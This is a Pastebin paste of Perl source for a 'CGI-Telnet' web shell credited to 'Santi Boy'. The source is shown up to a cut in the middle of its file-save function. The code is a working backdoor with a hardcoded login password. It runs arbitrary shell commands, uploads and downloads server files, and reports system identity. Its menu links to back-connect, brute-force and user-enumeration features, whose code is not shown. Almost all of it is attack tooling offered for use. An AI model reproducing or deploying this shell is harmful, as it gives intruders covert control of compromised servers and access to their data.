SHARE
TWEET

CGI Shell By Santi Boy

santiboy Oct 3rd, 2017 (edited) 477 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl -I/usr/local/bandmin
  2. use MIME::Base64;
  3. $Version= "CGI-Telnet Version 1.4";
  4. $EditPersion="./Santi Boy";
  5.  
  6. $Password = "Santi boy";            # Change this. You will need to enter this
  7.                 # to login.
  8. sub Is_Win(){
  9.     $os = &trim($ENV{"SERVER_SOFTWARE"});
  10.     if($os =~ m/win/i){
  11.         return 1;
  12.     }else{
  13.         return 0;
  14.     }
  15. }
  16. $WinNT = &Is_Win();         # You need to change the value of this to 1 if
  17.                     # you're running this script on a Windows NT
  18.                     # machine. If you're running it on Unix, you
  19.                     # can leave the value as it is.
  20.  
  21. $NTCmdSep = "&";            # This character is used to seperate 2 commands
  22.                     # in a command line on Windows NT.
  23.  
  24. $UnixCmdSep = ";";          # This character is used to seperate 2 commands
  25.                     # in a command line on Unix.
  26.  
  27. $CommandTimeoutDuration = 10;       # Time in seconds after commands will be killed
  28.                     # Don't set this to a very large value. This is
  29.                     # useful for commands that may hang or that
  30.                     # take very long to execute, like "find /".
  31.                     # This is valid only on Unix servers. It is
  32.                     # ignored on NT Servers.
  33.  
  34. $ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
  35.                     # browser as soon as it is output, otherwise
  36.                     # it is buffered and send when the command
  37.                     # completes. This is useful for commands like
  38.                     # ping, so that you can see the output as it
  39.                     # is being generated.
  40.  
  41. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
  42.  
  43. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  44. $CmdPwd = ($WinNT ? "cd" : "pwd");
  45. $PathSep = ($WinNT ? "\\" : "/");
  46. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  47. $cols= 130;
  48. $rows= 26;
  49. #------------------------------------------------------------------------------
  50. # Reads the input sent by the browser and parses the input variables. It
  51. # parses GET, POST and multipart/form-data that is used for uploading files.
  52. # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
  53. # Other variables can be accessed using $in{'var'}, where var is the name of
  54. # the variable. Note: Most of the code in this function is taken from other CGI
  55. # scripts.
  56. #------------------------------------------------------------------------------
  57. sub ReadParse
  58. {
  59.     local (*in) = @_ if @_;
  60.     local ($i, $loc, $key, $val);
  61.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  62.     if($ENV{'REQUEST_METHOD'} eq "GET")
  63.     {
  64.         $in = $ENV{'QUERY_STRING'};
  65.     }
  66.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
  67.     {
  68.         binmode(STDIN) if $MultipartFormData & $WinNT;
  69.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  70.     }
  71.     # handle file upload data
  72.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  73.     {
  74.         $Boundary = '--'.$1; # please refer to RFC1867
  75.         @list = split(/$Boundary/, $in);
  76.         $HeaderBody = $list[1];
  77.         $HeaderBody =~ /\r\n\r\n|\n\n/;
  78.         $Header = $`;
  79.         $Body = $';
  80.         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  81.         $in{'filedata'} = $Body;
  82.         $Header =~ /filename=\"(.+)\"/;
  83.         $in{'f'} = $1;
  84.         $in{'f'} =~ s/\"//g;
  85.         $in{'f'} =~ s/\s//g;
  86.  
  87.         # parse trailer
  88.         for($i=2; $list[$i]; $i++)
  89.         {
  90.             $list[$i] =~ s/^.+name=$//;
  91.             $list[$i] =~ /\"(\w+)\"/;
  92.             $key = $1;
  93.             $val = $';
  94.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  95.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  96.             $in{$key} = $val;
  97.         }
  98.     }
  99.     else # standard post data (url encoded, not multipart)
  100.     {
  101.         @in = split(/&/, $in);
  102.         foreach $i (0 .. $#in)
  103.         {
  104.             $in[$i] =~ s/\+/ /g;
  105.             ($key, $val) = split(/=/, $in[$i], 2);
  106.             $key =~ s/%(..)/pack("c", hex($1))/ge;
  107.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  108.             $in{$key} .= "" if (defined($in{$key}));
  109.             $in{$key} .= $val;
  110.         }
  111.     }
  112. }
  113. #------------------------------------------------------------------------------
  114. # function EncodeDir: encode base64 Path
  115. #------------------------------------------------------------------------------
  116. sub EncodeDir
  117. {
  118.     my $dir = shift;
  119.     $dir = trim(encode_base64($dir));
  120.     $dir =~ s/(\r|\n)//;
  121.     return $dir;
  122. }
  123. #------------------------------------------------------------------------------
  124. # Prints the HTML Page Header
  125. # Argument 1: Form item name to which focus should be set
  126. #------------------------------------------------------------------------------
  127. sub PrintPageHeader
  128. {
  129.     $EncodeCurrentDir = EncodeDir($CurrentDir);
  130.     my $id = `id` if(!$WinNT);
  131.     my $info = `uname -s -n -r -i`;
  132.     print "Content-type: text/html\n\n";
  133.     print <<END;
  134. <html>
  135. <head>
  136. <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  137. <title>./Santi Boy Cgi-Telnet [ $Version ]</title>
  138. $HtmlMetaHeader
  139. </head>
  140. <style>
  141. body{
  142. font: 10pt Verdana;
  143. color: #fff;
  144. }
  145. tr,td,table,input,textarea {
  146. BORDER-RIGHT:  #3e3e3e 1px solid;
  147. BORDER-TOP:    #3e3e3e 1px solid;
  148. BORDER-LEFT:   #3e3e3e 1px solid;
  149. BORDER-BOTTOM: #3e3e3e 1px solid;
  150. }
  151. #domain tr:hover{
  152. background-color: #444;
  153. }
  154. td {
  155. color: #2BA8EC;
  156. }
  157. .listdir td{
  158.     text-align: center;
  159. }
  160. .listdir th{
  161.     color: #FF9900;
  162. }
  163. .dir,.file
  164. {
  165.     text-align: left !important;
  166. }
  167. .dir{
  168.     font-size: 10pt;
  169.     font-weight: bold;
  170. }
  171. table {
  172. BACKGROUND-COLOR: #111;
  173. }
  174. input {
  175. BACKGROUND-COLOR: Black;
  176. color: #ff9900;
  177. }
  178. input.submit {
  179. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  180. color: #FFFFFF;
  181. border-color: #009900;
  182. }
  183. code {
  184. border: dashed 0px #333;
  185. color: while;
  186. }
  187. run {
  188. border          : dashed 0px #333;
  189. color: #FF00AA;
  190. }
  191. textarea {
  192. BACKGROUND-COLOR: #1b1b1b;
  193. font: Fixedsys bold;
  194. color: #aaa;
  195. }
  196. A:link {
  197.     COLOR: #2BA8EC; TEXT-DECORATION: none
  198. }
  199. A:visited {
  200.     COLOR: #2BA8EC; TEXT-DECORATION: none
  201. }
  202. A:hover {
  203.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  204.     color: #FFFFFF; TEXT-DECORATION: none
  205. }
  206. A:active {
  207.     color: Red; TEXT-DECORATION: none
  208. }
  209. .listdir tr:hover{
  210.     background: #444;
  211. }
  212. .listdir tr:hover td{
  213.     background: #444;
  214.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  215.     color: #FFFFFF; TEXT-DECORATION: none;
  216. }
  217. .notline{
  218.     background: #111;
  219. }
  220. .line{
  221.     background: #222;
  222. }
  223. </style>
  224. <script language="javascript">
  225. function Encoder(name)
  226. {
  227.     var e =  document.getElementById(name);
  228.     e.value = btoa(e.value);
  229.     return true;
  230. }
  231. function chmod_form(i,file)
  232. {
  233.     document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + "  name=chmod type=text size=5 /><input type=submit class='submit' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$EncodeCurrentDir'><input type=hidden name=f value='"+file+"'></form>";
  234.     document.getElementById("text_" + i).focus();
  235. }
  236. function rm_chmod_form(response,i,perms,file)
  237. {
  238.     response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
  239. }
  240. function rename_form(i,file,f)
  241. {
  242.     f.replace(/\\\\/g,"\\\\\\\\");
  243.     var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
  244.     document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + "  name=rename type=text value= '"+file+"' /><input type=submit class='submit' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$EncodeCurrentDir'><input type=hidden name=f value='"+file+"'></form>";
  245.     document.getElementById("text_" + i).focus();
  246. }
  247. function rm_rename_form(i,file,f)
  248. {
  249.     if(f=='f')
  250.     {
  251.         document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$EncodeCurrentDir&c=edit%20"+file+"%20'>" +file+ "</a>";
  252.     }else
  253.     {
  254.         document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
  255.     }
  256. }
  257. </script>
  258. <body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  259. <center><code>
  260. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  261. <tr>
  262.     <td align="center" rowspan=3>
  263.         <b><font size="3">o---[  $EditPersion ]---o</font></b>
  264.     </td>
  265.     <td>
  266.         $info
  267.     </td>
  268.     <td>Server IP:<font color="#ff9900"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#ff9900">$ENV{'REMOTE_ADDR'}</font>
  269.     </td>
  270. </tr>
  271. <tr>
  272. <td colspan="2">
  273. <a href="$ScriptLocation">Home</a> |
  274. <a href="$ScriptLocation?a=command&d=$EncodeCurrentDir">Command</a> |
  275. <a href="$ScriptLocation?a=gui&d=$EncodeCurrentDir">Files</a> |
  276. <a href="$ScriptLocation?a=upload&d=$EncodeCurrentDir">Upload File</a> |
  277. <a href="$ScriptLocation?a=download&d=$EncodeCurrentDir">Download File</a> |
  278. <a href="$ScriptLocation?a=backbind">Back & Bind</a> |
  279. <a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
  280. <a href="$ScriptLocation?a=checklog">Check Log</a> |
  281. <a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
  282. <a href="$ScriptLocation?a=logout">Logout</a> |
  283. <a target='_blank' href="#">Help</a>
  284. </td>
  285. </tr>
  286. <tr>
  287. <td colspan="2">
  288. $id
  289. </td>
  290. </tr>
  291. </table>
  292. <font id="ResponseData" color="#FFFFFF" >
  293. END
  294. }
  295. #------------------------------------------------------------------------------
  296. # Prints the Login Screen
  297. #------------------------------------------------------------------------------
  298. sub PrintLoginScreen
  299. {
  300.     print <<END;
  301. <pre><script type="text/javascript">
  302. TypingText = function(element, interval, cursor, finishedCallback) {
  303.   if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  304.     this.running = true;    // Never run.
  305.     return;
  306.   }
  307.   this.element = element;
  308.   this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  309.   this.interval = (typeof interval == "undefined" ? 100 : interval);
  310.   this.origText = this.element.innerHTML;
  311.   this.unparsedOrigText = this.origText;
  312.   this.cursor = (cursor ? cursor : "");
  313.   this.currentText = "";
  314.   this.currentChar = 0;
  315.   this.element.typingText = this;
  316.   if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  317.   TypingText.all.push(this);
  318.   this.running = false;
  319.   this.inTag = false;
  320.   this.tagBuffer = "";
  321.   this.inHTMLEntity = false;
  322.   this.HTMLEntityBuffer = "";
  323. }
  324. TypingText.all = new Array();
  325. TypingText.currentIndex = 0;
  326. TypingText.runAll = function() {
  327.   for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  328. }
  329. TypingText.prototype.run = function() {
  330.   if(this.running) return;
  331.   if(typeof this.origText == "undefined") {
  332.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);   // We haven't finished loading yet.  Have patience.
  333.     return;
  334.   }
  335.   if(this.currentText == "") this.element.innerHTML = "";
  336. //  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  337.   if(this.currentChar < this.origText.length) {
  338.     if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  339.       this.tagBuffer = "<";
  340.       this.inTag = true;
  341.       this.currentChar++;
  342.       this.run();
  343.       return;
  344.     } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  345.       this.tagBuffer += ">";
  346.       this.inTag = false;
  347.       this.currentText += this.tagBuffer;
  348.       this.currentChar++;
  349.       this.run();
  350.       return;
  351.     } else if(this.inTag) {
  352.       this.tagBuffer += this.origText.charAt(this.currentChar);
  353.       this.currentChar++;
  354.       this.run();
  355.       return;
  356.     } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  357.       this.HTMLEntityBuffer = "&";
  358.       this.inHTMLEntity = true;
  359.       this.currentChar++;
  360.       this.run();
  361.       return;
  362.     } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  363.       this.HTMLEntityBuffer += ";";
  364.       this.inHTMLEntity = false;
  365.       this.currentText += this.HTMLEntityBuffer;
  366.       this.currentChar++;
  367.       this.run();
  368.       return;
  369.     } else if(this.inHTMLEntity) {
  370.       this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  371.       this.currentChar++;
  372.       this.run();
  373.       return;
  374.     } else {
  375.       this.currentText += this.origText.charAt(this.currentChar);
  376.     }
  377.     this.element.innerHTML = this.currentText;
  378.     this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  379.     this.currentChar++;
  380.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  381.   } else {
  382.     this.currentText = "";
  383.     this.currentChar = 0;
  384.         this.running = false;
  385.         this.finishedCallback();
  386.   }
  387. }
  388. </script>
  389. </pre>
  390.  
  391. <br>
  392.  
  393. <script type="text/javascript">
  394. new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  395. TypingText.runAll();
  396.  
  397. </script>
  398. END
  399. }
  400. #------------------------------------------------------------------------------
  401. # encode html special chars
  402. #------------------------------------------------------------------------------
  403. sub UrlEncode($){
  404.     my $str = shift;
  405.     $str =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
  406.     return $str;
  407. }
  408. #------------------------------------------------------------------------------
  409. # Add html special chars
  410. #------------------------------------------------------------------------------
  411. sub HtmlSpecialChars($){
  412.     my $text = shift;
  413.     $text =~ s/&/&amp;/g;
  414.     $text =~ s/"/&quot;/g;
  415.     $text =~ s/'/'/g;
  416.     $text =~ s/</&lt;/g;
  417.     $text =~ s/>/&gt;/g;
  418.     return $text;
  419. }
  420. #------------------------------------------------------------------------------
  421. # Add link for directory
  422. #------------------------------------------------------------------------------
  423. sub AddLinkDir($)
  424. {
  425.     my $ac=shift;
  426.     my @dir=();
  427.     if($WinNT)
  428.     {
  429.         @dir=split(/\\/,$CurrentDir);
  430.     }else
  431.     {
  432.         @dir=split("/",&trim($CurrentDir));
  433.     }
  434.     my $path="";
  435.     my $result="";
  436.     foreach (@dir)
  437.     {
  438.         $path .= $_.$PathSep;
  439.         $result.="<a href='?a=".$ac."&d=".encode_base64($path)."'>".$_.$PathSep."</a>";
  440.     }
  441.     return $result;
  442. }
  443. #------------------------------------------------------------------------------
  444. # Prints the message that informs the user of a failed login
  445. #------------------------------------------------------------------------------
  446. sub PrintLoginFailedMessage
  447. {
  448.     print <<END;
  449.  
  450. Password:<br>
  451. Login incorrect<br><br>
  452. END
  453. }
  454.  
  455. #------------------------------------------------------------------------------
  456. # Prints the HTML form for logging in
  457. #------------------------------------------------------------------------------
  458. sub PrintLoginForm
  459. {
  460.     print <<END;
  461. <form name="f" method="POST" action="$ScriptLocation">
  462. <input type="hidden" name="a" value="login">
  463. Login : Administrator<br>
  464. Password:<input type="password" name="p">
  465. <input type="submit" value="Enter">
  466. </form>
  467. END
  468. }
  469. #------------------------------------------------------------------------------
  470. # Prints the footer for the HTML Page
  471. #------------------------------------------------------------------------------
  472. sub PrintPageFooter
  473. {
  474.     print "<br><font color=red>o---[  <font color=#ff9900>Edit by $EditPersion </font>  ]---o</font></code></center></body></html>";
  475. }
  476. #------------------------------------------------------------------------------
  477. # Retreives the values of all cookies. The cookies can be accesses using the
  478. # variable $Cookies{''}
  479. #------------------------------------------------------------------------------
  480. sub GetCookies
  481. {
  482.     @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  483.     foreach $cookie(@httpcookies)
  484.     {
  485.         ($id, $val) = split(/=/, $cookie);
  486.         $Cookies{$id} = $val;
  487.     }
  488. }
  489. #------------------------------------------------------------------------------
  490. # Prints the screen when the user logs out
  491. #------------------------------------------------------------------------------
  492. sub PrintLogoutScreen
  493. {
  494.     print "Connection closed by foreign host.<br><br>";
  495. }
  496.  
  497. #------------------------------------------------------------------------------
  498. # Logs out the user and allows the user to login again
  499. #------------------------------------------------------------------------------
  500. sub PerformLogout
  501. {
  502.     print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  503.     &PrintPageHeader("p");
  504.     &PrintLogoutScreen;
  505.  
  506.     &PrintLoginScreen;
  507.     &PrintLoginForm;
  508.     &PrintPageFooter;
  509.     exit;
  510. }
  511.  
  512. #------------------------------------------------------------------------------
  513. # This function is called to login the user. If the password matches, it
  514. # displays a page that allows the user to run commands. If the password doens't
  515. # match or if no password is entered, it displays a form that allows the user
  516. # to login
  517. #------------------------------------------------------------------------------
  518. sub PerformLogin
  519. {
  520.     if($LoginPassword eq $Password) # password matched
  521.     {
  522.         print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  523.         &PrintPageHeader;
  524.         print &ListDir;
  525.     }
  526.     else # password didn't match
  527.     {
  528.         &PrintPageHeader("p");
  529.         &PrintLoginScreen;
  530.         if($LoginPassword ne "") # some password was entered
  531.         {
  532.             &PrintLoginFailedMessage;
  533.  
  534.         }
  535.         &PrintLoginForm;
  536.         &PrintPageFooter;
  537.         exit;
  538.     }
  539. }
  540. #------------------------------------------------------------------------------
  541. # Prints the HTML form that allows the user to enter commands
  542. #------------------------------------------------------------------------------
  543. sub PrintCommandLineInputForm
  544. {
  545.     $EncodeCurrentDir = EncodeDir($CurrentDir);
  546.     my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
  547.     $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
  548.     return <<END;
  549. <form name="f" method="POST" action="$ScriptLocation" onSubmit="Encoder('c')">
  550.  
  551. <input type="hidden" name="a" value="command">
  552.  
  553. <input type="hidden" name="d" value="$EncodeCurrentDir">
  554. $Prompt
  555. <input type="text" size="40" name="c" id="c">
  556. <input type="submit" value="Enter">
  557. </form>
  558. END
  559. }
  560. #------------------------------------------------------------------------------
  561. # Prints the HTML form that allows the user to download files
  562. #------------------------------------------------------------------------------
  563. sub PrintFileDownloadForm
  564. {
  565.     $EncodeCurrentDir = EncodeDir($CurrentDir);
  566.     my $dir = &AddLinkDir("download");
  567.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  568.     return <<END;
  569. <form name="f" method="POST" action="$ScriptLocation">
  570. <input type="hidden" name="d" value="$EncodeCurrentDir">
  571. <input type="hidden" name="a" value="download">
  572. $Prompt download<br><br>
  573. Filename: <input type="text" name="f" size="35"><br><br>
  574. Download: <input type="submit" value="Begin">
  575.  
  576. </form>
  577. END
  578. }
  579.  
  580. #------------------------------------------------------------------------------
  581. # Prints the HTML form that allows the user to upload files
  582. #------------------------------------------------------------------------------
  583. sub PrintFileUploadForm
  584. {
  585.     $EncodeCurrentDir = EncodeDir($CurrentDir);
  586.     my $dir= &AddLinkDir("upload");
  587.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  588.     return <<END;
  589. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  590. $Prompt upload<br><br>
  591. Filename: <input type="file" name="f" size="35"><br><br>
  592. Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
  593. <label for="up">Overwrite if it Exists</label><br><br>
  594. Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
  595. <input type="hidden" name="d" value="$EncodeCurrentDir">
  596. <input type="hidden" name="a" value="upload">
  597. </form>
  598. END
  599. }
  600.  
  601. #------------------------------------------------------------------------------
  602. # This function is called when the timeout for a command expires. We need to
  603. # terminate the script immediately. This function is valid only on Unix. It is
  604. # never called when the script is running on NT.
  605. #------------------------------------------------------------------------------
  606. sub CommandTimeout
  607. {
  608.     if(!$WinNT)
  609.     {
  610.         alarm(0);
  611.         return <<END;
  612. </textarea>
  613. <br><font color=yellow>
  614. Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
  615. <br><font size='6' color=red>Killed it!</font>
  616. END
  617.     }
  618. }
  619. #------------------------------------------------------------------------------
  620. # This function displays the page that contains a link which allows the user
  621. # to download the specified file. The page also contains a auto-refresh
  622. # feature that starts the download automatically.
  623. # Argument 1: Fully qualified filename of the file to be downloaded
  624. #------------------------------------------------------------------------------
  625. sub PrintDownloadLinkPage
  626. {
  627.     local($FileUrl) = @_;
  628.     my $result="";
  629.     if(-e $FileUrl) # if the file exists
  630.     {
  631.         # encode the file link so we can send it to the browser
  632.         $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  633.         $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  634.         $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  635.         &PrintPageHeader("c");
  636.         $result .= <<END;
  637. Sending File $TransferFile...<br>
  638.  
  639. If the download does not start automatically,
  640. <a href="$DownloadLink">Click Here</a>
  641. END
  642.         $result .= &PrintCommandLineInputForm;
  643.     }
  644.     else # file doesn't exist
  645.     {
  646.         $result .= "Failed to download $FileUrl: $!";
  647.         $result .= &PrintFileDownloadForm;
  648.     }
  649.     return $result;
  650. }
  651. #------------------------------------------------------------------------------
  652. # This function reads the specified file from the disk and sends it to the
  653. # browser, so that it can be downloaded by the user.
  654. # Argument 1: Fully qualified pathname of the file to be sent.
  655. #------------------------------------------------------------------------------
  656. sub SendFileToBrowser
  657. {
  658.     my $result = "";
  659.     local($SendFile) = @_;
  660.     if(open(SENDFILE, $SendFile)) # file opened for reading
  661.     {
  662.         if($WinNT)
  663.         {
  664.             binmode(SENDFILE);
  665.             binmode(STDOUT);
  666.         }
  667.         $FileSize = (stat($SendFile))[7];
  668.         ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
  669.         print "Content-Type: application/x-unknown\n";
  670.         print "Content-Length: $FileSize\n";
  671.         print "Content-Disposition: attachment; filename=$1\n\n";
  672.         print while(<SENDFILE>);
  673.         close(SENDFILE);
  674.         exit(1);
  675.     }
  676.     else # failed to open file
  677.     {
  678.         $result .= "Failed to download $SendFile: $!";
  679.         $result .=&PrintFileDownloadForm;
  680.     }
  681.     return $result;
  682. }
  683. #------------------------------------------------------------------------------
  684. # This function is called when the user downloads a file. It displays a message
  685. # to the user and provides a link through which the file can be downloaded.
  686. # This function is also called when the user clicks on that link. In this case,
  687. # the file is read and sent to the browser.
  688. #------------------------------------------------------------------------------
  689. sub BeginDownload
  690. {
  691.     $EncodeCurrentDir = EncodeDir($CurrentDir);
  692.     # get fully qualified path of the file to be downloaded
  693.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  694.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  695.     {
  696.         $TargetFile = $TransferFile;
  697.     }
  698.     else # path is relative
  699.     {
  700.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  701.         $TargetFile .= $PathSep.$TransferFile;
  702.     }
  703.  
  704.     if($Options eq "go") # we have to send the file
  705.     {
  706.         &SendFileToBrowser($TargetFile);
  707.     }
  708.     else # we have to send only the link page
  709.     {
  710.         &PrintDownloadLinkPage($TargetFile);
  711.     }
  712. }
  713.  
  714. #------------------------------------------------------------------------------
  715. # This function is called when the user wants to upload a file. If the
  716. # file is not specified, it displays a form allowing the user to specify a
  717. # file, otherwise it starts the upload process.
  718. #------------------------------------------------------------------------------
  719. sub UploadFile
  720. {
  721.     # if no file is specified, print the upload form again
  722.     if($TransferFile eq "")
  723.     {
  724.         return &PrintFileUploadForm;
  725.  
  726.     }
  727.     my $result="";
  728.     # start the uploading process
  729.     $result .= "Uploading $TransferFile to $CurrentDir...<br>";
  730.  
  731.     # get the fullly qualified pathname of the file to be created
  732.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  733.     $TransferFile =~ m!([^/^\\]*)$!;
  734.     $TargetName .= $PathSep.$1;
  735.  
  736.     $TargetFileSize = length($in{'filedata'});
  737.     # if the file exists and we are not supposed to overwrite it
  738.     if(-e $TargetName && $Options ne "overwrite")
  739.     {
  740.         $result .= "Failed: Destination file already exists.<br>";
  741.     }
  742.     else # file is not present
  743.     {
  744.         if(open(UPLOADFILE, ">$TargetName"))
  745.         {
  746.             binmode(UPLOADFILE) if $WinNT;
  747.             print UPLOADFILE $in{'filedata'};
  748.             close(UPLOADFILE);
  749.             $result .= "Transfered $TargetFileSize Bytes.<br>";
  750.             $result .= "File Path: $TargetName<br>";
  751.         }
  752.         else
  753.         {
  754.             $result .= "Failed: $!<br>";
  755.         }
  756.     }
  757.     $result .= &PrintCommandLineInputForm;
  758.     return $result;
  759. }
  760. #------------------------------------------------------------------------------
  761. # This function is called when the user wants to download a file. If the
  762. # filename is not specified, it displays a form allowing the user to specify a
  763. # file, otherwise it displays a message to the user and provides a link
  764. # through  which the file can be downloaded.
  765. #------------------------------------------------------------------------------
  766. sub DownloadFile
  767. {
  768.     # if no file is specified, print the download form again
  769.     if($TransferFile eq "")
  770.     {
  771.         &PrintPageHeader("f");
  772.         return &PrintFileDownloadForm;
  773.     }
  774.  
  775.     # get fully qualified path of the file to be downloaded
  776.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  777.     {
  778.         $TargetFile = $TransferFile;
  779.     }
  780.     else # path is relative
  781.     {
  782.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  783.         $TargetFile .= $PathSep.$TransferFile;
  784.     }
  785.  
  786.     if($Options eq "go") # we have to send the file
  787.     {
  788.         return &SendFileToBrowser($TargetFile);
  789.     }
  790.     else # we have to send only the link page
  791.     {
  792.         return &PrintDownloadLinkPage($TargetFile);
  793.     }
  794. }
  795. #------------------------------------------------------------------------------
  796. # This function is called to execute commands. It displays the output of the
  797. # command and allows the user to enter another command. The change directory
  798. # command is handled differently. In this case, the new directory is stored in
  799. # an internal variable and is used each time a command has to be executed. The
  800. # output of the change directory command is not displayed to the users
  801. # therefore error messages cannot be displayed.
  802. #------------------------------------------------------------------------------
  803. sub ExecuteCommand
  804. {
  805.     $CurrentDir = &TrimSlashes($CurrentDir);
  806.     my $result="";
  807.     if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  808.     {
  809.         # we change the directory internally. The output of the
  810.         # command is not displayed.
  811.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  812.         chomp($CurrentDir = `$Command`);
  813.         $result .= &PrintCommandLineInputForm;
  814.  
  815.         $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
  816.         # xuat thong tin khi chuyen den 1 thu muc nao do!
  817.         $RunCommand= $WinNT?"dir":"dir -lia";
  818.         $result .= &RunCmd;
  819.     }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
  820.     {
  821.         $result .=  &SaveFileForm;
  822.     }else
  823.     {
  824.         $result .= &PrintCommandLineInputForm;
  825.         $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
  826.         $result .=&RunCmd;
  827.     }
  828.     $result .=  "</textarea>";
  829.     return $result;
  830. }
  831. #------------------------------------------------------------------------
  832. # run command
  833. #------------------------------------------------------------------------
  834. sub RunCmd
  835. {
  836.     my $result="";
  837.     $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  838.     if(!$WinNT)
  839.     {
  840.         $SIG{'ALRM'} = \&CommandTimeout;
  841.         alarm($CommandTimeoutDuration);
  842.     }
  843.     if($ShowDynamicOutput) # show output as it is generated
  844.     {
  845.         $|=1;
  846.         $Command .= " |";
  847.         open(CommandOutput, $Command);
  848.         while(<CommandOutput>)
  849.         {
  850.             $_ =~ s/(\n|\r\n)$//;
  851.             $result .= &HtmlSpecialChars("$_\n");
  852.         }
  853.         $|=0;
  854.     }
  855.     else # show output after command completes
  856.     {
  857.         $result .= &HtmlSpecialChars($Command);
  858.     }
  859.     if(!$WinNT)
  860.     {
  861.         alarm(0);
  862.     }
  863.     return $result;
  864. }
  865. #==============================================================================
  866. # Form Save File
  867. #==============================================================================
  868. sub SaveFileForm
  869. {
  870.     my $result ="";
  871.     $EncodeCurrentDir = EncodeDir($CurrentDir);
  872.     substr($RunCommand,0,5)="";
  873.     my $file=&trim($RunCommand);
  874.     $save='<br><input name="a" type="submit" value="save" >';
  875.     $File=$CurrentDir.$PathSep.$RunCommand;
